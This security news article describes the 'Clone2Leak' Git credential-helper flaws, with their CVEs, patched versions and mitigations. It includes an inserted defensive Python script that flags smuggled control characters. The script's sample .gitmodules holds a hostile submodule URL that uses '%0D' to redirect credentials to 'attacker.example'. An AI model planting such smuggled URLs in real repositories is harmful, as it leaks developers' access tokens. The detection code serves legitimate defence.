Clone2Leak attacks exploit Git flaws to steal credentials

A set of three distinct but related attacks, dubbed ‘Clone2Leak,’ can leak credentials by exploiting how Git and its credential helpers handle authentication requests.

The attack can compromise passwords and access tokens in GitHub Desktop, Git LFS, GitHub CLI/Codespaces, and the Git Credential Manager.

The flaws that make ‘Clone2Leak’ possible were discovered by Japanese researcher RyotaK of GMO Flatt Security, who reported them responsibly to the affected projects.

Security updates addressing all flaws have been made available, and impacted users are urged to ensure they’re running a safe release to mitigate the risk of having their secrets leaked.

Clone2Leak attacks

Each of the flaws discovered by RyotaK revolves around improper parsing of authentication requests made to credential helpers, allowing an attacker to trick Git into leaking stored credentials to a malicious server.

Credential helpers are tools that store and retrieve authentication credentials for when Git interacts with remote repositories, helping avoid repeatedly entering credentials for every Git operation.

Attackers can trick Git into leaking stored credentials when a user clones or interacts with a malicious repository.

Here is an overview of the three ways the Clone2Leak attack can manifest by exploiting various flaws:

  • Carriage return smuggling (CVE-2025-23040 and CVE-2024-50338) – GitHub Desktop and Git Credential Manager misinterpret carriage return (\r) characters in URLs. A malicious submodule URL with %0D tricks the credential helper into sending GitHub credentials to an attacker-controlled server instead of the intended host.
  • Newline injection (CVE-2024-53263) – Git LFS improperly allows newline (\n) characters in .lfsconfig files, bypassing Git’s security. Attackers can alter credential requests so that Git returns GitHub credentials to a malicious server instead of the correct one.
  • Logic flaws in credential retrieval (CVE-2024-53858) – GitHub CLI and GitHub Codespaces had overly permissive credential helpers that sent authentication tokens to unintended hosts. Attackers could steal GitHub access tokens by getting a user to clone a malicious repository inside Codespaces.
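A defensive check for the two smuggling vectors described above, added here as an example (it is not code from the article or from any of the affected projects): it scans a constructed .gitmodules-style fragment for URLs carrying raw or percent-encoded control characters such as %0D, and rejects credential-helper attribute values that contain a carriage return or newline. The sample content and the `attacker.example` host are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample: one benign submodule and one whose URL carries an
# encoded carriage return (%0D), the indicator named in the advisory.
SAMPLE_GITMODULES = """\
[submodule "lib"]
    path = lib
    url = https://github.com/example-org/lib.git
[submodule "evil"]
    path = evil
    url = https://github.com/example-org/evil.git%0Dhost=attacker.example
"""

# git config files (.gitmodules, .lfsconfig) use "key = value" lines.
_URL_LINE = re.compile(r"^\s*url\s*=\s*(.+?)\s*$", re.MULTILINE)
# Any ASCII control character (0x00-0x1F, 0x7F) has no place in a URL.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def find_suspicious_urls(config_text: str) -> list[str]:
    """Return every url= value in a .gitmodules/.lfsconfig text that
    contains a control character, either raw or percent-encoded."""
    flagged = []
    for match in _URL_LINE.finditer(config_text):
        url = match.group(1)
        # Decode %XX escapes once so a smuggled %0D shows up as a literal \r.
        if _CONTROL.search(url) or _CONTROL.search(unquote(url)):
            flagged.append(url)
    return flagged


def credential_request_is_clean(attrs: dict[str, str]) -> bool:
    """Check a credential-helper request (protocol/host/path attributes):
    a value with \\r or \\n could be split into a second, attacker-chosen
    line by a helper that parses line by line, so reject it outright."""
    return not any("\r" in value or "\n" in value for value in attrs.values())


if __name__ == "__main__":
    for url in find_suspicious_urls(SAMPLE_GITMODULES):
        print("suspicious submodule URL:", repr(url))
```

Run the same scan over a checked-out repository's .gitmodules and .lfsconfig before enabling any credential helper for it.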

All vulnerabilities mentioned above have now been patched, but users should ensure their tools are updated, audit credential configurations, and be cautious when cloning repositories.

The safe versions to upgrade to are GitHub Desktop 3.4.12 or newer, Git Credential Manager 2.6.1 or newer, Git LFS 3.6.1 or later, and GitHub CLI (gh) 2.63.0 or later.

Additionally, it is recommended that Git’s ‘credential.protectProtocol’ be enabled as an extra layer of defense against credential smuggling attacks.

Flatt Security’s report does not mention active exploitation in the wild, but with the details now public, the risk of attacks is elevated.
